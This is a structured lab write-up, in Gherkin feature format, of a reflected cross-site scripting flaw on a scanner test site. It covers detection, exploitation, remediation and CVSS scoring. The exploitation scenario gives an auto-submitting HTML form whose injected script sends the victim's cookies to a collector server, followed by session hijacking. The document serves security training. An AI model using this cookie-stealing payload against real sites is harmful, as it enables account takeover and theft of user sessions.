## Version 1.4.1
## language: en

Feature: Cross-Site-Scripting-Checkitem
  TOE:
    web-scanner-test-site
  Category:
    Input Validation
  Location:
    http://www.webscantest.com/
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Perform a XSS attack
  Recommendation:
    Sanitize inputs that may contain special characters from the HTML syntax

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Kali Linux      | 5.4.0     |
    | Firefox         | 68.6.0esr |
    | Burp Suite CE   | v2020-1   |
    | PHP             | 7.3.15-3  |
    | Python          | 2.7.18    |
  TOE information:
    Given that I access the site at
    """
    http://www.webscantest.com/
    """
    Then I see an index of different hacking challenges

  Scenario: Normal use case
    Given that I choose a XSS challenge under the URL
    """
    http://www.webscantest.com/crosstraining/checkitem_result.php
    """
    Then I see a search bar with a default query "Rake"
    When I submit the search
    Then I get redirected to a results page
    And see information about the product
    """
    http://www.webscantest.com/crosstraining/checkitem_result.php

    Product Details:
      ID  1
      Name  Rake
      Description clean up leaves
      Price 50
    """

  Scenario: Static detection
    Given there is not access to the source code
    Then a static detection cannot be performed

  Scenario: Dynamic detection
    Given the search functionality described above
    When I submit a random query that should not have results
    Then I get redirected to the search page again
    """
    http://www.webscantest.com/crosstraining/checkitem.php?error=1

    Invalid Search Result
    """
    And I notice my query is in the input box
    """
    <input type="text" name="q" size="80" value="test">
    """
    When I try to submit the payload
    """
    "><script>alert('XSS')</script>
    """
    Then I get a text box with the word "XSS"
    And I conclude the site is vulnerable to XSS attacks

  Scenario: Exploitation
    Given the site has a reflected XSS vulnerability
    When I use burp to analyze the request further
    Then I notice the server does an intermediate POST request with the query
    """
    POST /crosstraining/checkitem_lookup.php

    q=test
    """
    And based on the result shows the details or redirects back to the search
    Given the previous request flow
    And that I use a Python server to host a HTML that will submit the search
    """
    <body onload="document.xssform.submit()">
      <form name='xssform'  method='post'
          action='http://www.webscantest.com/crosstraining/checkitem_lookup.php'>
        <input type="hidden" name="q"
            value="&quot;><script>document.location =
                  'http://127.0.0.1:8001/getcookies.php?cookie=' +
                  document.cookie</script>">
    """
    And that I host a PHP server to receive the cookie
    When I send the URL of my HTTP server to an authenticated user
    And they access it
    Then I obtain their cookie
    When I use Burp to set my cookie with the obtained value
    Then I can access the site as the victim's user
    And I manage to hijack the session

  Scenario: Remediation
  Sanitize inputs that may contain special characters in the HTML syntax
    Given that the inputs are validated before constructing the HTML code
    When I use the previously successful query
    """
    "><script>alert('XSS')</script>
    """
    Then I do not get an alert box from the site

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.3/10 (Medium) - AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.0/10 (Medium) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (High) - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2020-04-24
